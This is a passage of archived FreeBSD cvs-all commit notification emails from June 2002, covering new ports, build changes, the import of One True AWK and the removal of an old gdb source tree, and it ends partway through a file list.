[216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id EF68237B406; Fri, 21 Jun 2002 12:41:34 -0700 (PDT) Received: (from ijliao@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5LJfYI63878; Fri, 21 Jun 2002 12:41:34 -0700 (PDT) (envelope-from ijliao) Message-Id: <200206211941.g5LJfYI63878@freefall.freebsd.org> From: Ying-Chieh Liao Date: Fri, 21 Jun 2002 12:41:34 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/sysutils Makefile ports/sysutils/and Makefile distinfo pkg-comment pkg-descr pkg-plist ports/sysutils/and/files patch-Makefile X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG ijliao 2002/06/21 12:41:34 PDT Modified files: sysutils Makefile Added files: sysutils/and Makefile distinfo pkg-comment pkg-descr pkg-plist sysutils/and/files patch-Makefile Log: add and 1.0.7 Auto Nice Daemon Revision Changes Path 1.267 +1 -0 ports/sysutils/Makefile 1.1 +23 -0 ports/sysutils/and/Makefile (new) 1.1 +1 -0 ports/sysutils/and/distinfo (new) 1.1 +26 -0 ports/sysutils/and/files/patch-Makefile (new) 1.1 +1 -0 ports/sysutils/and/pkg-comment (new) 1.1 +17 -0 ports/sysutils/and/pkg-descr (new) 1.1 +3 -0 ports/sysutils/and/pkg-plist (new) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 12:42: 5 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id BB2E737B41E; Fri, 21 Jun 2002 12:41:38 -0700 (PDT) Received: (from ijliao@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5LJfcr63952; Fri, 21 Jun 2002 12:41:38 -0700 (PDT) (envelope-from ijliao) Message-Id: <200206211941.g5LJfcr63952@freefall.freebsd.org> From: Ying-Chieh Liao Date: Fri, 21 Jun 2002 12:41:38 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: CVSROOT modules X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG ijliao 2002/06/21 12:41:38 PDT Modified files: . modules Log: and --> ports/sysutils/and Revision Changes Path 1.5396 +1 -0 CVSROOT/modules To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 12:50: 8 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 5595237B40B; Fri, 21 Jun 2002 12:50:04 -0700 (PDT) Received: (from dougb@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5LJo4j68891; Fri, 21 Jun 2002 12:50:04 -0700 (PDT) (envelope-from dougb) Message-Id: <200206211950.g5LJo4j68891@freefall.freebsd.org> From: Doug Barton Date: Fri, 21 Jun 2002 12:50:04 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/etc/rc.d amd mountd rpcbind X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG dougb 2002/06/21 12:50:04 PDT Modified files: etc/rc.d amd mountd rpcbind Log: Hone the rpcbind dependency checking. Submitted by: Mike Makonnen Revision Changes Path 1.4 +2 -2 src/etc/rc.d/amd 1.4 +1 -1 src/etc/rc.d/mountd 1.4 +1 -1 src/etc/rc.d/rpcbind To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 12:53: 7 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id B0A0A37B401; Fri, 21 Jun 2002 12:53:04 -0700 (PDT) Received: (from rwatson@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5LJr4D70497; Fri, 21 Jun 2002 12:53:04 -0700 (PDT) (envelope-from rwatson) Message-Id: <200206211953.g5LJr4D70497@freefall.freebsd.org> From: Robert Watson Date: Fri, 21 Jun 2002 12:53:04 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sys/conf NOTES X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG rwatson 2002/06/21 12:53:04 PDT Modified files: sys/conf NOTES Log: Remove CAPABILITIES from NOTES Revision Changes Path 1.1040 +0 -2 src/sys/conf/NOTES To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 12:56: 3 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id D688537B40F; Fri, 21 Jun 2002 12:55:51 -0700 (PDT) Received: (from bmah@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5LJtpX72161; Fri, 21 Jun 2002 12:55:51 -0700 (PDT) (envelope-from bmah) Message-Id: <200206211955.g5LJtpX72161@freefall.freebsd.org> From: "Bruce A. Mah" Date: Fri, 21 Jun 2002 12:55:51 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/release/doc/en_US.ISO8859-1/relnotes/common new.sgml X-FreeBSD-CVS-Branch: RELENG_4 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG bmah 2002/06/21 12:55:51 PDT Modified files: (Branch: RELENG_4) release/doc/en_US.ISO8859-1/relnotes/common new.sgml Log: Move sendmail release note from kernel section to userland section. Revision Changes Path 1.22.2.254 +5 -4 src/release/doc/en_US.ISO8859-1/relnotes/common/new.sgml To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 13: 6:25 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 3556E37B406; Fri, 21 Jun 2002 13:06:21 -0700 (PDT) Received: (from demon@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5LK6Lb79168; Fri, 21 Jun 2002 13:06:21 -0700 (PDT) (envelope-from demon) Message-Id: <200206212006.g5LK6Lb79168@freefall.freebsd.org> From: Dmitry Sivachenko Date: Fri, 21 Jun 2002 13:06:20 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/lang Makefile ports/lang/php-mode.el Makefile distinfo pkg-comment pkg-descr pkg-message pkg-plist X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG demon 2002/06/21 13:06:20 PDT Modified files: lang Makefile Added files: lang/php-mode.el Makefile distinfo pkg-comment pkg-descr pkg-message pkg-plist Log: New port: Emacs major mode for editing PHP files. Revision Changes Path 1.301 +1 -0 ports/lang/Makefile 1.1 +34 -0 ports/lang/php-mode.el/Makefile (new) 1.1 +1 -0 ports/lang/php-mode.el/distinfo (new) 1.1 +1 -0 ports/lang/php-mode.el/pkg-comment (new) 1.1 +3 -0 ports/lang/php-mode.el/pkg-descr (new) 1.1 +4 -0 ports/lang/php-mode.el/pkg-message (new) 1.1 +6 -0 ports/lang/php-mode.el/pkg-plist (new) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 13: 6:45 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 9598037B44B; Fri, 21 Jun 2002 13:06:33 -0700 (PDT) Received: (from demon@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5LK6Xe79218; Fri, 21 Jun 2002 13:06:33 -0700 (PDT) (envelope-from demon) Message-Id: <200206212006.g5LK6Xe79218@freefall.freebsd.org> From: Dmitry Sivachenko Date: Fri, 21 Jun 2002 13:06:33 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: CVSROOT modules X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG demon 2002/06/21 13:06:33 PDT Modified files: . modules Log: php-mode.el --> ports/lang/php-mode.el Revision Changes Path 1.5397 +1 -0 CVSROOT/modules To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 13: 9:47 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 7E3C837B414; Fri, 21 Jun 2002 13:09:41 -0700 (PDT) Received: (from obrien@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5LK9fg79576; Fri, 21 Jun 2002 13:09:41 -0700 (PDT) (envelope-from obrien) Message-Id: <200206212009.g5LK9fg79576@freefall.freebsd.org> From: "David E. O'Brien" Date: Fri, 21 Jun 2002 13:09:41 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/contrib/one-true-awk FIXES FREEBSD-upgrade README awk.1 awk.h awkgram.y b.c lex.c lib.c mac.code main.c makefile maketab.c parse.c proctab.c proto.h run.c tran.c X-FreeBSD-CVS-Branch: RELENG_4 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG obrien 2002/06/21 13:09:41 PDT Added files: (Branch: RELENG_4) contrib/one-true-awk FIXES FREEBSD-upgrade README awk.1 awk.h awkgram.y b.c lex.c lib.c mac.code main.c makefile maketab.c parse.c proctab.c proto.h run.c tran.c Log: MFC: the 1 True AWK Revision Changes Path 1.1.1.2.2.1 +735 -0 src/contrib/one-true-awk/FIXES (new) 1.3.2.1 +24 -0 src/contrib/one-true-awk/FREEBSD-upgrade (new) 1.1.1.3.2.1 +83 -0 src/contrib/one-true-awk/README (new) 1.1.1.1.2.1 +529 -0 src/contrib/one-true-awk/awk.1 (new) 1.1.1.1.2.1 +231 -0 src/contrib/one-true-awk/awk.h (new) 1.1.1.1.2.1 +486 -0 src/contrib/one-true-awk/awkgram.y (new) 1.1.1.2.2.1 +900 -0 src/contrib/one-true-awk/b.c (new) 1.1.1.2.2.1 +583 -0 src/contrib/one-true-awk/lex.c (new) 1.1.1.1.2.1 +682 -0 src/contrib/one-true-awk/lib.c (new) 1.1.1.1.2.1 +65 -0 src/contrib/one-true-awk/mac.code (new) 1.1.1.3.2.1 +185 -0 src/contrib/one-true-awk/main.c (new) 1.1.1.3.2.1 +82 -0 src/contrib/one-true-awk/makefile (new) 1.1.1.1.2.1 +168 -0 src/contrib/one-true-awk/maketab.c (new) 1.1.1.1.2.1 +276 -0 src/contrib/one-true-awk/parse.c (new) 1.1.1.1.2.1 +205 -0 src/contrib/one-true-awk/proctab.c (new) 1.1.1.1.2.1 +194 -0 src/contrib/one-true-awk/proto.h (new) 1.1.1.2.2.1 +1908 -0 src/contrib/one-true-awk/run.c (new) 1.1.1.2.2.1 +440 -0 src/contrib/one-true-awk/tran.c (new) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 13:12:14 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id B9DBE37B414; Fri, 21 Jun 2002 13:12:08 -0700 (PDT) Received: (from obrien@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5LKC8v80200; Fri, 21 Jun 2002 13:12:08 -0700 (PDT) (envelope-from obrien) Message-Id: <200206212012.g5LKC8v80200@freefall.freebsd.org> From: "David E. O'Brien" Date: Fri, 21 Jun 2002 13:12:08 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/usr.bin Makefile src/usr.bin/awk Makefile X-FreeBSD-CVS-Branch: RELENG_4 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG obrien 2002/06/21 13:12:08 PDT Modified files: (Branch: RELENG_4) usr.bin Makefile Added files: (Branch: RELENG_4) usr.bin/awk Makefile Log: Hook up 1TA to the build. Revision Changes Path 1.144.2.13 +1 -0 src/usr.bin/Makefile 1.9.2.1 +29 -0 src/usr.bin/awk/Makefile (new) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 13:15:45 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id AE4EC37B405; Fri, 21 Jun 2002 13:15:42 -0700 (PDT) Received: (from obrien@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5LKFgU81636; Fri, 21 Jun 2002 13:15:42 -0700 (PDT) (envelope-from obrien) Message-Id: <200206212015.g5LKFgU81636@freefall.freebsd.org> From: "David E. O'Brien" Date: Fri, 21 Jun 2002 13:15:42 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/gnu/usr.bin/binutils/gdb Makefile X-FreeBSD-CVS-Branch: RELENG_4 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG obrien 2002/06/21 13:15:42 PDT Modified files: (Branch: RELENG_4) gnu/usr.bin/binutils/gdb Makefile Log: MFC: rev 1.58 (link with libiberty.a before libreadline.so) Revision Changes Path 1.43.2.3 +4 -4 src/gnu/usr.bin/binutils/gdb/Makefile To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 13:26:21 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 5B9D937B40F; Fri, 21 Jun 2002 13:24:59 -0700 (PDT) Received: (from obrien@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5LKOxY87846; Fri, 21 Jun 2002 13:24:59 -0700 (PDT) (envelope-from obrien) Message-Id: <200206212024.g5LKOxY87846@freefall.freebsd.org> From: "David E. O'Brien" Date: Fri, 21 Jun 2002 13:24:59 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/contrib/gdb.291 COPYING COPYING.LIB FREEBSD-Xlist FREEBSD-upgrade Makefile.in README config-ml.in config.guess config.if config.sub configure configure.in src/contrib/gdb.291/gdb .gdbinit COPYING ChangeLog ChangeLog-96 ... X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG obrien 2002/06/21 13:24:59 PDT Removed files: contrib/gdb.291 COPYING COPYING.LIB FREEBSD-Xlist FREEBSD-upgrade Makefile.in README config-ml.in config.guess config.if config.sub configure configure.in contrib/gdb.291/gdb .gdbinit COPYING ChangeLog ChangeLog-96 ChangeLog-97 ChangeLog-98 Makefile.in NEWS README TODO abug-rom.c acinclude.m4 aclocal.m4 alpha-tdep.c annotate.c annotate.h arc-tdep.c ax-gdb.c ax-gdb.h ax-general.c ax.h bcache.c bcache.h blockframe.c breakpoint.c breakpoint.h buildsym.c buildsym.h c-exp.y c-lang.c c-lang.h c-typeprint.c c-valprint.c call-cmds.h callback.c callback.h ch-exp.c ch-lang.c ch-lang.h ch-typeprint.c ch-valprint.c coffread.c command.c command.h complaints.c complaints.h config.in configure configure.host configure.in configure.tgt copying.awk copying.c core-aout.c core-regset.c corefile.c corelow.c cp-valprint.c d10v-tdep.c d30v-tdep.c dbug-rom.c dbxread.c dcache.c dcache.h debugify.c debugify.h defs.h demangle.c dink32-rom.c dve3900-rom.c dwarf2read.c dwarfread.c elfread.c environ.c environ.h eval.c exc_request.defs exec.c expprint.c expression.h f-exp.y f-lang.c f-lang.h f-typeprint.c f-valprint.c findvar.c fork-child.c fr30-tdep.c frame.h gdb-stabs.h gdb.1 gdb.gdb gdb_stat.h gdb_string.h gdba.el gdbarch.c gdbarch.h gdbcmd.h gdbcore.h gdbinit.in gdbthread.h gdbtypes.c gdbtypes.h gnu-regex.c gnu-regex.h hp-psymtab-read.c hp-symtab-read.c hpread.h hpux-thread.c i386-tdep.c i386b-nat.c i387-tdep.c infcmd.c inferior.h inflow.c infptrace.c infrun.c inftarg.c infttrace.c jv-exp.tab.c jv-exp.y jv-lang.c jv-lang.h jv-typeprint.c jv-valprint.c language.c language.h m2-exp.y m2-lang.c m2-lang.h m2-typeprint.c m2-valprint.c m32r-rom.c m32r-stub.c m32r-tdep.c m68klinux-nat.c main.c maint.c mdebugread.c mem-break.c minsyms.c mipsread.c mn10200-tdep.c mn10300-tdep.c msg.defs msg_reply.defs nlmread.c notify.defs ns32knbsd-nat.c objfiles.c objfiles.h ocd.c ocd.h os9kread.c parse.c parser-defs.h partial-stab.h ppc-bdm.c printcmd.c process_reply.defs remote-d10v.c remote-rdi.c remote-sds.c remote-sim.h remote-utils.c remote-utils.h remote.c reply_mig_hack.awk saber.suppress scm-exp.c scm-lang.c scm-lang.h scm-tags.h scm-valprint.c ser-ocd.c ser-tcp.c ser-unix.c serial.c serial.h sh-stub.c signals.h sol-thread.c solib.c solib.h source.c sparclet-rom.c sparclet-stub.c stabsread.c stabsread.h stack.c symfile.c symfile.h symmisc.c symtab.c symtab.h target.c target.h terminal.h thread.c thread.h top.c top.h tracepoint.c tracepoint.h typeprint.c typeprint.h utils.c v850-tdep.c valarith.c valops.c valprint.c valprint.h value.h values.c xcoffsolib.h contrib/gdb.291/gdb/29k-share README udi_soc contrib/gdb.291/gdb/29k-share/udi udi2go32.c udiids.h udip2soc.c udiphcfg.h udiphunix.h udiproc.h udipt29k.h udiptcfg.h udisoc.h udr.c contrib/gdb.291/gdb/config/alpha alpha-linux.mh alpha-linux.mt alpha-osf1.mh alpha-osf1.mt alpha-osf2.mh alpha-osf3.mh nm-linux.h nm-osf.h nm-osf2.h nm-osf3.h tm-alpha.h tm-alphalinux.h xm-alphalinux.h xm-alphaosf.h contrib/gdb.291/gdb/config/arm arm.mh arm.mt nm-arm.h tm-arm.h xm-arm.h contrib/gdb.291/gdb/config/i386 cygwin.mh cygwin.mt cygwin32.mh cygwin32.mt fbsd.mh fbsd.mt gdbserve.mt go32.mh i386aix.mh i386aix.mt i386aout.mt i386bsd.mh i386bsd.mt i386dgux.mh i386gnu.mh i386gnu.mt i386lynx.mh i386lynx.mt i386m3.mh i386m3.mt i386mach.mh i386mk.mh i386mk.mt i386nw.mt i386os9k.mt i386sco.mh i386sco4.mh i386sco5.mh i386sco5.mt i386sol2.mh i386sol2.mt i386v.mh i386v.mt i386v32.mh i386v4.mh i386v4.mt i386v42mp.mh i386v42mp.mt linux.mh linux.mt nbsd.mh nbsd.mt ncr3000.mh ncr3000.mt nm-fbsd.h nm-gnu.h nm-i386aix.h nm-i386bsd.h nm-i386lynx.h nm-i386mach.h nm-i386sco.h nm-i386sco4.h nm-i386sco5.h nm-i386sol2.h nm-i386v.h nm-i386v4.h nm-i386v42mp.h nm-linux.h nm-m3.h nm-nbsd.h nm-ptx4.h nm-sun386.h nm-symmetry.h ptx.mh ptx.mt ptx4.mh ptx4.mt sun386.mh sun386.mt symmetry.mh symmetry.mt tm-cygwin.h tm-cygwin32.h tm-fbsd.h tm-i386.h tm-i386aix.h tm-i386bsd.h tm-i386gnu.h tm-i386lynx.h tm-i386m3.h tm-i386mk.h tm-i386nw.h tm-i386os9k.h tm-i386sco5.h tm-i386sol2.h tm-i386v.h tm-i386v4.h tm-i386v42mp.h tm-linux.h tm-nbsd.h tm-ptx.h tm-ptx4.h tm-sun386.h tm-symmetry.h windows.mh xm-cygwin.h xm-cygwin32.h xm-go32.h xm-i386aix.h xm-i386bsd.h xm-i386gnu.h xm-i386lynx.h xm-i386m3.h xm-i386mach.h xm-i386mk.h xm-i386sco.h xm-i386v.h xm-i386v32.h xm-i386v4.h xm-linux.h xm-nbsd.h xm-ptx.h xm-ptx4.h xm-sun386.h xm-symmetry.h xm-windows.h contrib/gdb.291/gdb/config/mips tm-tx39.h tm-tx39l.h tm-vr4100.h tm-vr5000.h tm-vr5000el.h tx39.mt tx39l.mt vr4100.mt vr5000.mt vr5000el.mt contrib/gdb.291/gdb/config/powerpc aix.mh aix.mt cygwin.mh cygwin.mt gdbserve.mt linux.mh macos.mh macos.mt nm-aix.h nm-macos.h nm-solaris.h ppc-eabi.mt ppc-nw.mt ppc-sim.mt ppcle-eabi.mt ppcle-sim.mt solaris.mh solaris.mt tm-cygwin.h tm-macos.h tm-ppc-aix.h tm-ppc-eabi.h tm-ppc-nw.h tm-ppc-sim.h tm-ppcle-eabi.h tm-ppcle-sim.h tm-solaris.h xm-aix.h xm-cygwin.h xm-linux.h xm-mpw.h xm-solaris.h contrib/gdb.291/gdb/config/sparc linux.mh linux.mt nbsd.mh nbsd.mt nm-linux.h nm-nbsd.h nm-sparclynx.h nm-sun4os4.h nm-sun4sol2.h sp64.mt sp64sim.mt sp64sol2.mt sparc-em.mt sparclet.mt sparclite.mt sparclynx.mh sparclynx.mt sun4os4.mh sun4os4.mt sun4sol2.mh sun4sol2.mt tm-linux.h tm-nbsd.h tm-sp64.h tm-sp64sim.h tm-sparc.h tm-sparclet.h tm-sparclite.h tm-sparclynx.h tm-spc-em.h tm-sun4os4.h tm-sun4sol2.h tm-vxsparc.h vxsparc.mt xm-linux.h xm-nbsd.h xm-sparc.h xm-sparclynx.h xm-sun4os4.h xm-sun4sol2.h contrib/gdb.291/gdb/doc ChangeLog GDBvn.texi HPPA-cfg.texi LRS Makefile.in a4rc.sed agentexpr.texi all-cfg.texi annotate.texi configure configure.in gdb.texinfo gdbint.texinfo h8-cfg.texi libgdb.texinfo lpsrc.sed psrc.sed refcard.tex remote.texi stabs.texinfo contrib/gdb.291/gdb/gdbserver Makefile.in README configure.in gdbreplay.c gdbserver.1 low-hppabsd.c low-linux.c low-lynx.c low-sim.c low-sparc.c low-sun3.c remote-utils.c server.c server.h utils.c contrib/gdb.291/gdb/nlm Makefile.in configure configure.in gdbserve.c gdbserve.def i386.c i386.h ppc.c ppc.h prelude.c contrib/gdb.291/gdb/tui ChangeLog Makefile Makefile.in tui.c tui.h tuiCommand.c tuiCommand.h tuiData.c tuiData.h tuiDataWin.c tuiDataWin.h tuiDisassem.c tuiDisassem.h tuiGeneralWin.c tuiGeneralWin.h tuiIO.c tuiIO.h tuiLayout.c tuiLayout.h tuiRegs.c tuiRegs.h tuiSource.c tuiSource.h tuiSourceWin.c tuiSourceWin.h tuiStack.c tuiStack.h tuiWin.c tuiWin.h Log: *hand wave* This is not the GDB you want. This GDB has never existed. Go about your debugging. Revision Changes Path 1.2 +0 -339 src/contrib/gdb.291/COPYING (dead) 1.2 +0 -481 src/contrib/gdb.291/COPYING.LIB (dead) 1.3 +0 -30 src/contrib/gdb.291/FREEBSD-Xlist (dead) 1.2 +0 -9 src/contrib/gdb.291/FREEBSD-upgrade (dead) 1.2 +0 -1366 src/contrib/gdb.291/Makefile.in (dead) 1.2 +0 -50 src/contrib/gdb.291/README (dead) 1.2 +0 -624 src/contrib/gdb.291/config-ml.in (dead) 1.2 +0 -599 src/contrib/gdb.291/config.guess (dead) 1.2 +0 -87 src/contrib/gdb.291/config.if (dead) 1.2 +0 -1110 src/contrib/gdb.291/config.sub (dead) 1.2 +0 -1303 src/contrib/gdb.291/configure (dead) 1.2 +0 -763 src/contrib/gdb.291/configure.in (dead) 1.2 +0 -16 src/contrib/gdb.291/gdb/.gdbinit (dead) 1.2 +0 -9 src/contrib/gdb.291/gdb/29k-share/README (dead) 1.2 +0 -607 src/contrib/gdb.291/gdb/29k-share/udi/udi2go32.c (dead) 1.2 +0 -48 src/contrib/gdb.291/gdb/29k-share/udi/udiids.h (dead) 1.2 +0 -1250 src/contrib/gdb.291/gdb/29k-share/udi/udip2soc.c (dead) 1.2 +0 -44 src/contrib/gdb.291/gdb/29k-share/udi/udiphcfg.h (dead) 1.2 +0 -81 src/contrib/gdb.291/gdb/29k-share/udi/udiphunix.h (dead) 1.2 +0 -308 src/contrib/gdb.291/gdb/29k-share/udi/udiproc.h (dead) 1.2 +0 -87 src/contrib/gdb.291/gdb/29k-share/udi/udipt29k.h (dead) 1.2 +0 -19 src/contrib/gdb.291/gdb/29k-share/udi/udiptcfg.h (dead) 1.2 +0 -184 src/contrib/gdb.291/gdb/29k-share/udi/udisoc.h (dead) 1.2 +0 -427 src/contrib/gdb.291/gdb/29k-share/udi/udr.c (dead) 1.2 +0 -9 src/contrib/gdb.291/gdb/29k-share/udi_soc (dead) 1.2 +0 -339 src/contrib/gdb.291/gdb/COPYING (dead) 1.2 +0 -1415 src/contrib/gdb.291/gdb/ChangeLog (dead) 1.2 +0 -5116 src/contrib/gdb.291/gdb/ChangeLog-96 (dead) 1.2 +0 -2855 src/contrib/gdb.291/gdb/ChangeLog-97 (dead) 1.2 +0 -7122 src/contrib/gdb.291/gdb/ChangeLog-98 (dead) 1.2 +0 -1534 src/contrib/gdb.291/gdb/Makefile.in (dead) 1.2 +0 -1338 src/contrib/gdb.291/gdb/NEWS (dead) 1.2 +0 -583 src/contrib/gdb.291/gdb/README (dead) 1.2 +0 -468 src/contrib/gdb.291/gdb/TODO (dead) 1.2 +0 -169 src/contrib/gdb.291/gdb/abug-rom.c (dead) 1.2 +0 -861 src/contrib/gdb.291/gdb/acinclude.m4 (dead) 1.2 +0 -605 src/contrib/gdb.291/gdb/aclocal.m4 (dead) 1.4 +0 -1415 src/contrib/gdb.291/gdb/alpha-tdep.c (dead) 1.2 +0 -540 src/contrib/gdb.291/gdb/annotate.c (dead) 1.2 +0 -95 src/contrib/gdb.291/gdb/annotate.h (dead) 1.2 +0 -733 src/contrib/gdb.291/gdb/arc-tdep.c (dead) 1.2 +0 -1942 src/contrib/gdb.291/gdb/ax-gdb.c (dead) 1.2 +0 -111 src/contrib/gdb.291/gdb/ax-gdb.h (dead) 1.2 +0 -552 src/contrib/gdb.291/gdb/ax-general.c (dead) 1.2 +0 -285 src/contrib/gdb.291/gdb/ax.h (dead) 1.2 +0 -189 src/contrib/gdb.291/gdb/bcache.c (dead) 1.2 +0 -72 src/contrib/gdb.291/gdb/bcache.h (dead) 1.2 +0 -854 src/contrib/gdb.291/gdb/blockframe.c (dead) 1.2 +0 -4117 src/contrib/gdb.291/gdb/breakpoint.c (dead) 1.2 +0 -424 src/contrib/gdb.291/gdb/breakpoint.h (dead) 1.2 +0 -1039 src/contrib/gdb.291/gdb/buildsym.c (dead) 1.2 +0 -259 src/contrib/gdb.291/gdb/buildsym.h (dead) 1.2 +0 -1641 src/contrib/gdb.291/gdb/c-exp.y (dead) 1.2 +0 -478 src/contrib/gdb.291/gdb/c-lang.c (dead) 1.2 +0 -84 src/contrib/gdb.291/gdb/c-lang.h (dead) 1.2 +0 -831 src/contrib/gdb.291/gdb/c-typeprint.c (dead) 1.2 +0 -469 src/contrib/gdb.291/gdb/c-valprint.c (dead) 1.2 +0 -28 src/contrib/gdb.291/gdb/call-cmds.h (dead) 1.3 +0 -354 src/contrib/gdb.291/gdb/callback.c (dead) 1.2 +0 -41 src/contrib/gdb.291/gdb/callback.h (dead) 1.2 +0 -2090 src/contrib/gdb.291/gdb/ch-exp.c (dead) 1.2 +0 -653 src/contrib/gdb.291/gdb/ch-lang.c (dead) 1.2 +0 -39 src/contrib/gdb.291/gdb/ch-lang.h (dead) 1.2 +0 -346 src/contrib/gdb.291/gdb/ch-typeprint.c (dead) 1.2 +0 -664 src/contrib/gdb.291/gdb/ch-valprint.c (dead) 1.4 +0 -2257 src/contrib/gdb.291/gdb/coffread.c (dead) 1.2 +0 -1466 src/contrib/gdb.291/gdb/command.c (dead) 1.2 +0 -259 src/contrib/gdb.291/gdb/command.h (dead) 1.2 +0 -171 src/contrib/gdb.291/gdb/complaints.c (dead) 1.2 +0 -46 src/contrib/gdb.291/gdb/complaints.h (dead) 1.2 